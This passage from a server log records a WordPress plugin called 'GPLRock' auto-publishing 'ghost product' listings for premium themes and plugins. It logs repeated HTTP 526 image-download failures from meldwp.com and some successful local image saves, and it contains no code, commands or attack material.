[05-Apr-2026 14:06:02 UTC] GPLRock: Image download failed for product dionis-winery-vineyard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:04 UTC] GPLRock: Image download failed for product dionis-winery-vineyard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dionis---winery--vineyard-wordpress-theme-12255.webp for product dionis-winery-vineyard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:06:06 UTC] GPLRock: Image download failed for product dionis-winery-vineyard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:08 UTC] GPLRock: Image download failed for product dionis-winery-vineyard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dionis---winery--vineyard-wordpress-theme-12255.webp for product dionis-winery-vineyard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:06:10 UTC] GPLRock WARNING: Image download failed for product dionis-winery-vineyard-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dionis---winery--vineyard-wordpress-theme-12255.webp [05-Apr-2026 14:06:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dionis-winery-vineyard-wordpress-theme [05-Apr-2026 14:06:11 UTC] GPLRock: Image download failed for product cenes-jewelry-wordpress-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:13 UTC] GPLRock: Image download failed for product cenes-jewelry-wordpress-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cenes---jewelry-wordpress-store-theme-15477.webp for product cenes-jewelry-wordpress-store-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:06:15 UTC] GPLRock: Image download failed for product cenes-jewelry-wordpress-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:17 UTC] GPLRock: Image download failed for product cenes-jewelry-wordpress-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cenes---jewelry-wordpress-store-theme-15477.webp for product cenes-jewelry-wordpress-store-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:06:19 UTC] GPLRock WARNING: Image download failed for product cenes-jewelry-wordpress-store-theme. URL: https://meldwp.com/wp-content/uploads/cenes---jewelry-wordpress-store-theme-15477.webp [05-Apr-2026 14:06:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cenes-jewelry-wordpress-store-theme [05-Apr-2026 14:08:07 UTC] GPLRock: Image download failed for product samral-electronic-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:09 UTC] GPLRock: Image download failed for product samral-electronic-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/samral---electronic-woocommerce-theme-9777.webp for product samral-electronic-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:11 UTC] GPLRock: Image download failed for product samral-electronic-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:13 UTC] GPLRock: Image download failed for product samral-electronic-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/samral---electronic-woocommerce-theme-9777.webp for product samral-electronic-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:15 UTC] GPLRock WARNING: Image download failed for product samral-electronic-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/samral---electronic-woocommerce-theme-9777.webp [05-Apr-2026 14:08:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: samral-electronic-woocommerce-theme [05-Apr-2026 14:08:15 UTC] GPLRock: Image downloaded successfully for product definity-creative-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09a0189c.webp [05-Apr-2026 14:08:15 UTC] GPLRock: Using pre-downloaded image for product definity-creative-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09a0189c.webp [05-Apr-2026 14:08:15 UTC] GPLRock: Ghost product published with image - Product ID: definity-creative-multi-purpose-wordpress-theme [05-Apr-2026 14:08:15 UTC] GPLRock: Image download failed for product academist-education-learning-management-system-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:18 UTC] GPLRock: Image download failed for product academist-education-learning-management-system-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/academist---education--learning-management-system-wordpress-theme-3772.webp for product academist-education-learning-management-system-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:20 UTC] GPLRock: Image download failed for product academist-education-learning-management-system-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:22 UTC] GPLRock: Image download failed for product academist-education-learning-management-system-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/academist---education--learning-management-system-wordpress-theme-3772.webp for product academist-education-learning-management-system-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:24 UTC] GPLRock WARNING: Image download failed for product academist-education-learning-management-system-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/academist---education--learning-management-system-wordpress-theme-3772.webp [05-Apr-2026 14:08:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: academist-education-learning-management-system-wordpress-theme [05-Apr-2026 14:08:24 UTC] GPLRock: Image download failed for product xtrm-extreme-sports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:26 UTC] GPLRock: Image download failed for product xtrm-extreme-sports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xtrm---extreme-sports-25334.webp for product xtrm-extreme-sports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:28 UTC] GPLRock: Image download failed for product xtrm-extreme-sports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:30 UTC] GPLRock: Image download failed for product xtrm-extreme-sports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xtrm---extreme-sports-25334.webp for product xtrm-extreme-sports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:33 UTC] GPLRock WARNING: Image download failed for product xtrm-extreme-sports. URL: https://meldwp.com/wp-content/uploads/xtrm---extreme-sports-25334.webp [05-Apr-2026 14:08:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xtrm-extreme-sports [05-Apr-2026 14:08:33 UTC] GPLRock: Image download failed for product dotlife-coaching-online-courses-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:35 UTC] GPLRock: Image download failed for product dotlife-coaching-online-courses-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dotlife--coaching-online-courses-wordpress-23049.webp for product dotlife-coaching-online-courses-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:37 UTC] GPLRock: Image download failed for product dotlife-coaching-online-courses-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:39 UTC] GPLRock: Image download failed for product dotlife-coaching-online-courses-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dotlife--coaching-online-courses-wordpress-23049.webp for product dotlife-coaching-online-courses-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:41 UTC] GPLRock WARNING: Image download failed for product dotlife-coaching-online-courses-wordpress. URL: https://meldwp.com/wp-content/uploads/dotlife--coaching-online-courses-wordpress-23049.webp [05-Apr-2026 14:08:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dotlife-coaching-online-courses-wordpress [05-Apr-2026 14:08:42 UTC] GPLRock: Image download failed for product patker-pet-care-and-veterinary-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:44 UTC] GPLRock: Image download failed for product patker-pet-care-and-veterinary-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/patker---pet-care-and-veterinary-wordpress-theme-20787.webp for product patker-pet-care-and-veterinary-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:46 UTC] GPLRock: Image download failed for product patker-pet-care-and-veterinary-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:48 UTC] GPLRock: Image download failed for product patker-pet-care-and-veterinary-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/patker---pet-care-and-veterinary-wordpress-theme-20787.webp for product patker-pet-care-and-veterinary-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:50 UTC] GPLRock WARNING: Image download failed for product patker-pet-care-and-veterinary-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/patker---pet-care-and-veterinary-wordpress-theme-20787.webp [05-Apr-2026 14:08:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: patker-pet-care-and-veterinary-wordpress-theme [05-Apr-2026 14:08:50 UTC] GPLRock: Image download failed for product dezert-easycart-woocommerce-shopping-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:52 UTC] GPLRock: Image download failed for product dezert-easycart-woocommerce-shopping-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dezert-easycart--woocommerce-shopping-theme-10575.webp for product dezert-easycart-woocommerce-shopping-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:55 UTC] GPLRock: Image download failed for product dezert-easycart-woocommerce-shopping-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:57 UTC] GPLRock: Image download failed for product dezert-easycart-woocommerce-shopping-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:08:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dezert-easycart--woocommerce-shopping-theme-10575.webp for product dezert-easycart-woocommerce-shopping-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:08:59 UTC] GPLRock WARNING: Image download failed for product dezert-easycart-woocommerce-shopping-theme. URL: https://meldwp.com/wp-content/uploads/dezert-easycart--woocommerce-shopping-theme-10575.webp [05-Apr-2026 14:08:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dezert-easycart-woocommerce-shopping-theme [05-Apr-2026 14:08:59 UTC] GPLRock: Image download failed for product arise-wp-multipurpose-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:01 UTC] GPLRock: Image download failed for product arise-wp-multipurpose-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arise-wp---multipurpose-woocommerce-responsive-theme-32981.webp for product arise-wp-multipurpose-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:09:04 UTC] GPLRock: Image download failed for product arise-wp-multipurpose-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:06 UTC] GPLRock: Image download failed for product arise-wp-multipurpose-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arise-wp---multipurpose-woocommerce-responsive-theme-32981.webp for product arise-wp-multipurpose-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:09:08 UTC] GPLRock WARNING: Image download failed for product arise-wp-multipurpose-woocommerce-responsive-theme. URL: https://meldwp.com/wp-content/uploads/arise-wp---multipurpose-woocommerce-responsive-theme-32981.webp [05-Apr-2026 14:09:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arise-wp-multipurpose-woocommerce-responsive-theme [05-Apr-2026 14:09:08 UTC] GPLRock: Image download failed for product smash-tennis-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:10 UTC] GPLRock: Image download failed for product smash-tennis-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smash---tennis-wordpress-theme-25053.webp for product smash-tennis-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:09:12 UTC] GPLRock: Image download failed for product smash-tennis-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:14 UTC] GPLRock: Image download failed for product smash-tennis-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smash---tennis-wordpress-theme-25053.webp for product smash-tennis-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:09:16 UTC] GPLRock WARNING: Image download failed for product smash-tennis-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/smash---tennis-wordpress-theme-25053.webp [05-Apr-2026 14:09:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smash-tennis-wordpress-theme [05-Apr-2026 14:09:17 UTC] GPLRock: Image download failed for product anema-creative-onepage-multipage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:19 UTC] GPLRock: Image download failed for product anema-creative-onepage-multipage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anema--creative-onepage--multipage-wordpress-theme-7130.webp for product anema-creative-onepage-multipage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:09:21 UTC] GPLRock: Image download failed for product anema-creative-onepage-multipage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:23 UTC] GPLRock: Image download failed for product anema-creative-onepage-multipage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:09:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anema--creative-onepage--multipage-wordpress-theme-7130.webp for product anema-creative-onepage-multipage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:09:25 UTC] GPLRock WARNING: Image download failed for product anema-creative-onepage-multipage-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/anema--creative-onepage--multipage-wordpress-theme-7130.webp [05-Apr-2026 14:09:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anema-creative-onepage-multipage-wordpress-theme [05-Apr-2026 14:10:34 UTC] GPLRock: Image downloaded successfully for product flatastic-versatile-multi-vendor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1dfc52d.jpg [05-Apr-2026 14:10:34 UTC] GPLRock: Using pre-downloaded image for product flatastic-versatile-multi-vendor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1dfc52d.jpg [05-Apr-2026 14:10:34 UTC] GPLRock: Ghost product published with image - Product ID: flatastic-versatile-multi-vendor-wordpress-theme [05-Apr-2026 14:10:36 UTC] GPLRock: Image downloaded successfully for product searchwp-manage-ignored (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fcb96417.jpg [05-Apr-2026 14:10:36 UTC] GPLRock: Using pre-downloaded image for product searchwp-manage-ignored: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fcb96417.jpg [05-Apr-2026 14:10:36 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-manage-ignored [05-Apr-2026 14:10:37 UTC] GPLRock: Image downloaded successfully for product envira-gallery-protection-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-536705cd.jpg [05-Apr-2026 14:10:38 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-protection-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-536705cd.jpg [05-Apr-2026 14:10:38 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-protection-addon [05-Apr-2026 14:10:39 UTC] GPLRock: Image downloaded successfully for product css-igniter-the-styler-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43bf7567.jpg [05-Apr-2026 14:10:39 UTC] GPLRock: Using pre-downloaded image for product css-igniter-the-styler-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43bf7567.jpg [05-Apr-2026 14:10:39 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-the-styler-wordpress-theme [05-Apr-2026 14:10:41 UTC] GPLRock: Image downloaded successfully for product true-mag-wordpress-theme-for-video-and-magazine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5edf143d.jpg [05-Apr-2026 14:10:41 UTC] GPLRock: Using pre-downloaded image for product true-mag-wordpress-theme-for-video-and-magazine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5edf143d.jpg [05-Apr-2026 14:10:41 UTC] GPLRock: Ghost product published with image - Product ID: true-mag-wordpress-theme-for-video-and-magazine [05-Apr-2026 14:10:42 UTC] GPLRock: Image downloaded successfully for product popup-maker-terms-conditions-popups (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-69c165b7.jpg [05-Apr-2026 14:10:42 UTC] GPLRock: Using pre-downloaded image for product popup-maker-terms-conditions-popups: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-69c165b7.jpg [05-Apr-2026 14:10:42 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-terms-conditions-popups [05-Apr-2026 14:10:44 UTC] GPLRock: Image downloaded successfully for product mythemeshop-newstimes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5788b08.jpg [05-Apr-2026 14:10:44 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-newstimes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5788b08.jpg [05-Apr-2026 14:10:44 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-newstimes [05-Apr-2026 14:10:46 UTC] GPLRock: Image downloaded successfully for product studiopress-pretty-chic-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8062c133.jpg [05-Apr-2026 14:10:46 UTC] GPLRock: Using pre-downloaded image for product studiopress-pretty-chic-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8062c133.jpg [05-Apr-2026 14:10:46 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-pretty-chic-pro-genesis-wordpress-theme [05-Apr-2026 14:21:53 UTC] GPLRock: Image download failed for product talking-minds-psychotherapist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:21:55 UTC] GPLRock: Image download failed for product talking-minds-psychotherapist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:21:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/talking-minds---psychotherapist-wordpress-theme-5446.webp for product talking-minds-psychotherapist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:21:57 UTC] GPLRock: Image download failed for product talking-minds-psychotherapist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:21:59 UTC] GPLRock: Image download failed for product talking-minds-psychotherapist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:22:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/talking-minds---psychotherapist-wordpress-theme-5446.webp for product talking-minds-psychotherapist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:22:01 UTC] GPLRock WARNING: Image download failed for product talking-minds-psychotherapist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/talking-minds---psychotherapist-wordpress-theme-5446.webp [05-Apr-2026 14:22:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: talking-minds-psychotherapist-wordpress-theme [05-Apr-2026 14:22:01 UTC] GPLRock: Image download failed for product star-deal-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:22:03 UTC] GPLRock: Image download failed for product star-deal-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:32:09 UTC] GPLRock: Image downloaded successfully for product formidable-forms-user-tracking (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0019ab6d.jpg [05-Apr-2026 14:32:09 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-user-tracking: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0019ab6d.jpg [05-Apr-2026 14:32:09 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-user-tracking [05-Apr-2026 14:32:11 UTC] GPLRock: Image downloaded successfully for product yith-best-price-guaranteed-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-24980c72.jpg [05-Apr-2026 14:32:11 UTC] GPLRock: Using pre-downloaded image for product yith-best-price-guaranteed-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-24980c72.jpg [05-Apr-2026 14:32:11 UTC] GPLRock: Ghost product published with image - Product ID: yith-best-price-guaranteed-for-woocommerce-premium [05-Apr-2026 14:32:13 UTC] GPLRock: Image downloaded successfully for product elegant-themes-foxy-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b487ff1c.jpg [05-Apr-2026 14:32:13 UTC] GPLRock: Using pre-downloaded image for product elegant-themes-foxy-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b487ff1c.jpg [05-Apr-2026 14:32:13 UTC] GPLRock: Ghost product published with image - Product ID: elegant-themes-foxy-woocommerce-theme [05-Apr-2026 14:32:14 UTC] GPLRock: Image downloaded successfully for product mythemeshop-daynight-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-58636f56.jpg [05-Apr-2026 14:32:14 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-daynight-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-58636f56.jpg [05-Apr-2026 14:32:14 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-daynight-wordpress-theme [05-Apr-2026 14:32:16 UTC] GPLRock: Image downloaded successfully for product point-finder-directory-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5790e1ca.jpg [05-Apr-2026 14:32:16 UTC] GPLRock: Using pre-downloaded image for product point-finder-directory-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5790e1ca.jpg [05-Apr-2026 14:32:16 UTC] GPLRock: Ghost product published with image - Product ID: point-finder-directory-directory-listing-wordpress-theme [05-Apr-2026 14:32:18 UTC] GPLRock: Image downloaded successfully for product sensei-content-drip (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9436ac77.jpg [05-Apr-2026 14:32:18 UTC] GPLRock: Using pre-downloaded image for product sensei-content-drip: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9436ac77.jpg [05-Apr-2026 14:32:18 UTC] GPLRock: Ghost product published with image - Product ID: sensei-content-drip [05-Apr-2026 14:32:19 UTC] GPLRock: Image downloaded successfully for product themeisle-adrenaline-pt-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d639cfcc.jpg [05-Apr-2026 14:32:19 UTC] GPLRock: Using pre-downloaded image for product themeisle-adrenaline-pt-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d639cfcc.jpg [05-Apr-2026 14:32:19 UTC] GPLRock: Ghost product published with image - Product ID: themeisle-adrenaline-pt-wordpress-theme [05-Apr-2026 14:32:21 UTC] GPLRock: Image downloaded successfully for product envira-gallery-dynamic-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff8768d4.jpg [05-Apr-2026 14:32:21 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-dynamic-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff8768d4.jpg [05-Apr-2026 14:32:21 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-dynamic-addon [05-Apr-2026 14:32:22 UTC] GPLRock: Image downloaded successfully for product learndash-notes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0575123.jpg [05-Apr-2026 14:32:22 UTC] GPLRock: Using pre-downloaded image for product learndash-notes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0575123.jpg [05-Apr-2026 14:32:22 UTC] GPLRock: Ghost product published with image - Product ID: learndash-notes [05-Apr-2026 14:32:24 UTC] GPLRock: Image downloaded successfully for product ubergrid-responsive-grid-builder-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67caad45.jpg [05-Apr-2026 14:32:24 UTC] GPLRock: Using pre-downloaded image for product ubergrid-responsive-grid-builder-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67caad45.jpg [05-Apr-2026 14:32:24 UTC] GPLRock: Ghost product published with image - Product ID: ubergrid-responsive-grid-builder-for-wordpress [05-Apr-2026 14:33:16 UTC] GPLRock: Image download failed for product fame-digital-technologyservice-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:19 UTC] GPLRock: Image download failed for product fame-digital-technologyservice-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fame---digital-technologyservice-wordpress-theme-3248.webp for product fame-digital-technologyservice-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:21 UTC] GPLRock: Image download failed for product fame-digital-technologyservice-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:23 UTC] GPLRock: Image download failed for product fame-digital-technologyservice-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fame---digital-technologyservice-wordpress-theme-3248.webp for product fame-digital-technologyservice-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:25 UTC] GPLRock WARNING: Image download failed for product fame-digital-technologyservice-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fame---digital-technologyservice-wordpress-theme-3248.webp [05-Apr-2026 14:33:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fame-digital-technologyservice-wordpress-theme [05-Apr-2026 14:33:25 UTC] GPLRock: Image download failed for product 